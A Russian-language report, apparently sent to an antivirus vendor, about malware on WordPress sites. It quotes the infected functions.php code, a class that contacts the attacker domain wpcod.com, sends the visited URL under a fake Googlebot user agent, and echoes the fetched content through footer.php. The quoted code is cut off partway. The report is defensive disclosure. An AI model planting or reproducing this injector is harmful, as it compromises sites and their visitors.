Надо удалить В хостинг-аккаунте вредоносный код.

Добавить в антивирус вредоносный код.

Добрый день.

В процессе обслуживания сайтов обнаружил вредоносный код который заражает WordPress сайты.

Cудя по статьям в сети это часто встречающийся вредоносны код!

Предлагаю добавить его в ваш антивирус и помочь многим пользователям избавится от проблем.

Домен злоумышленников wpcod.com, их провайдеру уже выслана жалоба.

Ссылки с подтверждением вредоносности и код приведены ниже.

Код находится в function.php

class Get_links {

    var $host = 'wpcod.com';

    var $path = '/system.php';

    var $_socket_timeout    = 5;

    function get_remote() {

        $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);

        $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

        $links_class = new Get_links();

        $host = $links_class->host;

        $path = $links_class->path;

        $_socket_timeout = $links_class->_socket_timeout;

        //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);

        @ini_set('default_socket_timeout',   $_socket_timeout);

        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {

            $opts = array(

                'http'=>array(

                    'method'=>"GET",

                    'header'=>"Referer: {$req_url}\r\n".

                        "User-Agent: {$_user_agent}\r\n"

                )

            );

            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context);

            preg_match('/(\';

    }

}

и в footer.php

$links = new Get_links(); $links = $links->get_remote(); echo $links; ?>